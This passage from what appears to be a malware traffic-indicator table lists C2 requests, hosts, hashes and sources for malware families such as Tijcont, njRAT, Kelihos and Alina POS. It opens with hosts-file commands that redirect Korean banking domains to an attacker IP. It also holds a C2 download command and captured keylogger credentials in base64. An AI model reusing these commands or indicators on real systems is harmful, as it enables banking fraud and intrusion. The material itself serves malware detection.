ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93.ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\driver.... etc | 845b0945d5fe0e0aaa16234dc21484e0 | http://my.opera.com/cjbi/blog/index.dml/tag/Tijcont | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/09/tijcont-strings-CRIME.html | 9/8/2013 | |
71 | 2013-09-08 | APT | Darkcomet | GET | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== | /a.php?id= | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== Host: [ip.address] | none | dc98abba995771480aecf4769a88756e | http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/ | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.html | 9/8/2013 | |||
72 | 2013-09-08 | CRIME | Kelihos | GET | /index.htm | /index.htm | Host: 188.129.243.106 Content-Length: 164 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0 ..D.lUUE..H@.q..#.....K.zfgE0F.A..K. Variants: /default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm | Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1) Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0) Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) Mozilla/5.0 (Windows NT 5.0; rv:21.0) Mozilla/5.0 (Windows NT 5.1) Mozilla/5.0 (Windows NT 5.1; rv:21.0) Mozilla/5.0 (Windows NT 6.1; rv:21.0) Mozilla/5.0 (Windows NT 6.1; rv:22.0) Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Mozilla/5.0 (Windows NT 6.2) Mozilla/5.0 (Windows NT 6.2; rv:21.0) Mozilla/5.0 (Windows NT 6.2; WOW64) Mozilla/5.0 (X11; Linux i686; rv:21.0) Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Opera/9.80 (Windows NT 5.1; U; zh-sg) Opera/9.80 (Windows NT 6.0) Opera/9.80 (Windows NT 6.1; U; es-ES) | 1052 | C94DC5C9BB7B99658C275B7337C64B33 | http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/09/kelihos-strings-CRIME.html | 9/8/2013 | ||
73 | 2013-08-27 | CRIME | Kuluoz Run command from C2 | n | c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e | &crc= | HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 27 Aug 2013 20:06:57 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding | ||||||||||
74 | 8/22/2013 23:58:00 <p> 2015-02-03 | APT | njRAT / Backdoor.LV | <p> lv|'|'|TndfQzQyNjRFQkI =|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ... <p> 171.ll|'|'|Li4uLi4uLk5FVy4 uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0. <p> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX 0FFNTJD MzdE|'|'|SENTA|'|'|senta i55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2V sbCB2LiBIb2JieSBMb2JieSBBYnJp ZGdlZCBbQ29tcGF0aWJpbGl 0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2, <p>lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof] | <p> lv <p> 171.ll <p> 251.ll | 1d3baedd747f6f9bf92c81eb9f63b34b | http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html | http://bit.ly/aptsamples | http://contagioexchange.blogspot.com/2013/08/njrat-backdoorlv-strings-apt.html | 6/13/2013 | CK | ||||||
75 | 2013-08-21 | CRIME | Chimerka.1 / Refeys.A | POST | /sys.php | /sys.php | Host: rxform.org Content-type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 Referer: http://www.gmail.com Content-length: 112 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 | bede0da1abc1122acf8af91f6d6b289f | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2 | http://bit.ly/crimesamples | http://contagioexchange.blogspot.com/2013/08/refeysa-strings-CRIME.html | 8/1/2013 | ||||
76 | 2013-08-21 | CRIME | Sality | GET | /images/logos.gif?1f5428=8212640 | /logos.gif? | User-Agent: Opera/9.50 (Windows NT 6.0; U; en) Host: boyabateml.k12.tr Cache-Control: no-cache | Opera/9.50 (Windows NT 6.0; U; en) Opera/8.89 (Windows NT 6.0; U; en) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728) | 176222923eaa64b43b4f75f8afaad81e a972f612afa03f1d0b3ffad10843e935 4f693f209daccf69b1c785573c0002c5 | 8/1/2013 | |||||||
77 | 2013-08-19 | CRIME | Nitedrem | GET | /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393 | /down.asp?action=install&u= | User-Agent: fucking Host: bucks.onepiecedream.com:99 | fucking | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
78 | 2013-08-19 | CRIME | Nitedrem | GET | /upx/kod.txt?k=123&t=7215 | /kod.txt?k=123&t= | User-Agent: fucking Host: 103.20.193.231:88 | User-Agent: fucking | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
79 | 2013-08-19 | CRIME | Nitedrem | GET | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||||
80 | 2013-08-19 | CRIME | Nitedrem | GET | /config.txt?&t=4593 | /config.txt?&t= | User-Agent: Update Host: in.onepiecedream.com:99 Cache-Control: no-cache | Update | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
81 | 2013-08-19 | CRIME | Nitedrem | GET | /fish.jpg?&t=4426 | /fish.jpg?&t= | User-Agent: Update Host: www.dianwofacai.com Cache-Control: no-cache | Update | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
82 | 2013-08-17 | CRIME | Sality | GET | /?12da89=12355930 | /?12da89= | User-Agent: KUKU v5.06exp =9355466431 Host: www.kjwre9fqwieluoi.info Cache-Control: no-cache | KUKU v5.06exp =9355466431 | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | |||
83 | 2013-08-17 | CRIME | Sality | GET | /images/logos.gif?114bbc=9068000 | /logos.gif? | User-Agent: KUKU v5.06exp =9355466431 Host: hayatspa.com Cache-Control: no-cache | User-Agent: KUKU v5.06exp =9355466431 | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | |||
84 | 2013-08-17 | CRIME | Sality | GET | /setting.doc | /setting.doc | Host: yahoo.com Cache-Control: no-cache | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | ||||
85 | 2013-08-16 | CRIME | Torpig /Sinowal miniloader | GET | / | Host: 166.78.144.80 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Length: 247 Connection: close | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | 011C1CA6030EE091CE7C20CD3AAECFA0 | http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html | 8/1/2013 | ||||
86 | 2013-08-16 | CRIME | Torpig /Sinowal miniloader | GET | /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0 | /search2?fr= | Content-Type: application/x-www-form-urlencoded Host: annotatinggramma.info Content-Length: 2804 Connection: Keep-Alive Cache-Control: no-cache | 011C1CA6030EE091CE7C20CD3AAECFA0 | http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/ | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html | 8/1/2013 | |||||
87 | 2013-08-13 | CRIME | EK Popads | GET | /?7d456d68729292e9843cb9dde2d2f7b4=34 | /? | /?7d456d68729292e9843cb9dde2d2f7b4=34 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: xrp.8taglik.info Connection: Keep-Alive | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
88 | 2013-08-13 | CRIME | EK Popads | GET | /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf | Accept: */* Accept-Language: en-US Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org x-flash-version: 11,7,700,202 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: qkvuz.12taglik.info Connection: Keep-Alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
89 | 2013-08-13 | CRIME | EK Popads | GET | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar content-type: application/x-java-archive accept-encoding: pack200-gzip,gzip Cache-Control: no-cache Pragma: no-cache User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07 Host: fizv.11taglik.info Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
90 | 2013-08-13 | CRIME | EK Popads | GET | /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in | /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: tqhsy.8taglik.info Connection: Keep-Alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
91 | 2013-08-13 | CRIME | EK Popads | GET | /39ff9ff8c3b603d8eed017df64dd2799.eot | Accept: */* Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Host: fizv.11taglik.info Connection: Keep-Alive | na | TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
92 | 2013-08-11 | CRIME | Alina POS v5.6 | POST | /duck/push.php | push.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v5.6 Host: 208.98.63.226 Content-Length: 82 Cache-Control: no-cache | Alina v5.6 | 5A22ED78B6454E34217D07C4AF37B23B | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-CRIME.html | 2013-06 | |||
93 | 2013-08-11 | CRIME | Alina POS v5.6 | POST | /adobe/version_check.php | /version_check.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v5.3 Host: 91.229.76.97 Content-Length: 2980 Cache-Control: no-cache | Alina v5.3 | 4c754150639aa3a86ca4d6b6342820be | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/alina-pos-strings-CRIME.html | 2013-06 | |||
94 | 2013-08-11 | CRIME | Alina POS v6.0 | POST | /adobe/version_check.php | /version_check.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v6.0 Host: 91.229.76.97 Content-Length: 3349 Cache-Control: no-cache | Alina v6.0 | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | 2013-08 | |||||||
95 | 2013-08-09 | APT (IN) | Hanove / Tourist | POST | /kamp.php | /kamp.php | /kamp.php Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152 User-Agent: SIMPLE Host: http://[xxx] Content-Length: 501 Cache-Control: no-cache --78DDB5A902BB8FFF3F398B45BEDCD152 Content-Disposition: form-data; name="uploaddir" water/USER-6E3C3361930800270A87A2/D/ --78DDB5A902BB8FFF3F398B45BEDCD152 Content-Disposition: form-data; name="filename"; filename="license_23_05_2004_08_10_00.txt" Content-Type: text/plain Content-Transfer-Encoding: binary | SIMPLE | 37207835e128516fe17af3dacc83a00c | 2011:09:21 | |||||||
96 | 2013-08-07 | APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#... 00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.# 00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &....... | 6178, 8089, 9696. | Packet layout: [0x0 padding] [0x5 bytes header] [0x4 bytes, little-endian: compressed packet length including the preceding 0x0s] [0x4 bytes, little-endian: decompressed packet length + length of preceding 0's] [0x78 0x9c (zlib stream header)] [compressed data]. 2nd stage traffic | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | Strings (in stage 2): x86_GmRemote.dll Mark D:\Project\GTProject\Public\List\ListManager.cpp There are multiple stage 2 versions but this is the one we've seen most often. (CitizenLab) | 8/2/2013 | |||||
97 | 2013-08-07 | APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | <removed> 00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ. 00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........ 00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........ 00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This 00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b 00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod 00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61 | 6178, 8089, 9696. | 2nd stage Download | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | 8/2/2013 | ||||||
98 | 2013-08-07 | APT | Surtr Initial GET | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <removed>. 00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ...... | 6178, 8089, 9696. | Initial GET | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | Strings (in stage 1): CrtRunTime.log aCvVpR _One.dll _Fra.dll soul LiveUpdata_Mem\ Burn\ | 8/2/2013 | |||||
99 | 2013-07-15 | APT | Taleret | GET | / | / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: mac.gov.skies.tw Connection: Keep-Alive Cache-Control: no-cache Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 443 | FED166A667AB9CBB1EF6331B8E9D7894 5328CFCB46EF18ECF7BA0D21A7ADC02C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 DefaultConnectionSettings Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections explorer.exe http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html | 7/1/2013 | |||
100 | 2013-07-15 | APT | Taleret | GET | /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: tw.myblog.yahoo.com Connection: Keep-Alive Cache-Control: no-cache Cookie: B=8sah02d6on6k9&b=3&s=as | Mozilla/4.0 (compatible; MSIE 6.0; Win32) | FED166A667AB9CBB1EF6331B8E9D7894 5328CFCB46EF18ECF7BA0D21A7ADC02C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html | 7/1/2013 | ||||
101 | 2013-06-26 | CRIME | Sweet Orange EK | GET | /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA== | /in.php?q= | /in.php?q=hPOChVXlw9QgOzotCb88uSk36elxMCiVxol9XkXXwg== Accept: text/html, application/xhtml+xml, */* Referer: http://techmedianet.com/server.php?fs=1&w=1280&h=800&q=hPOChVXlw9QgOzotC b88uSk36elxMCiVxol9XkXXwg== Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Host: emberstat.com Connection: Keep-Alive | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) | http://urlquery.net/report.php?id=3120429 http://malforsec.blogspot.com/2013/03/making-orange-jam-analyzing-sweet.html | 6/1/2013 | |||||||
102 | 2013-06-06 | CRIME | ArcomRat / Dokstormac | POST | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] | MSIE 7.0 for the file request | 1866 1888 1865 1890 | CRIME or APT? Possibly some Middle East RAT; NO...NO...NO... in the traffic; preceded by a request for a file with an odd extension such as .awe or .avf | 62B4C4432361C9B4B69C480C07AFA356 191FDC32304C50D9A054420E59BD21A9 4015DD5B27EB612CA5DC320033E284C5 | http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356 http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2 | http://bit.ly/crimesamples | unpacked samples have extensive Unicode strings | 2013-05 | |||
103 | 2013-06-06 | CRIME | Ardamax keylogger | SMTP | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com 250-PIPELINING 250-SIZE 41697280 250-8BITMIME 250 AUTH PLAIN LOGIN XYMCOOKIE AUTH LOGIN 334 VXNlcm5hbWU6 bGludXgwNjQwMEB5YWhvby5jb20= 334 UGFzc3dvcmQ6 YXplcnR5LzA2 235 2.0.0 OK MAIL FROM: | 25 | SMTP AUTH LOGIN: username and password are sent base64-encoded | E33AF9E602CBB7AC3634C2608150DD18 | http://www.ardamax.com/keylogger/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-05 | ||||
104 | 2013-06-06 | CRIME | Matsnu - MBR wiping ransomware | POST | /f44/myse.php | /myse.php | /f44/myse.php Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: twintrade.net Content-Length: 344 Connection: Keep-Alive Cache-Control: no-cache IaTAREu1TfHHoUGCS/mqKHdWfz/L0PzKX8dpzjFoUfvV37klDPOn8KhS1lUdzm/J3kyOJugD4blZFNrw6+5lERjc0hbtCne95tSSWjACXP29rvfspXWDWDxKi17NkSh2x5eCYMIRqMeV8NZhUFtptnZ/gobO3nDnW31beGzC/0X/hzUAyb2Edpy87oPb3ohAup62JPQvqzOH3KLmS/MiVHkHo7Xv3XYHkagkLVGJJrHfhFl1tXpZIf8LOCwuAtOA5FuJC+VbkAgAaYux0Uz7w9kjxL/9jNq7G+g/UMlUwCO4ppEFvmCq/Ps3ElNe7k7IrTZ+uwn6FBCihp08muLj+A== | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 1B2D2A4B97C7C2727D571BBF9376F54F | 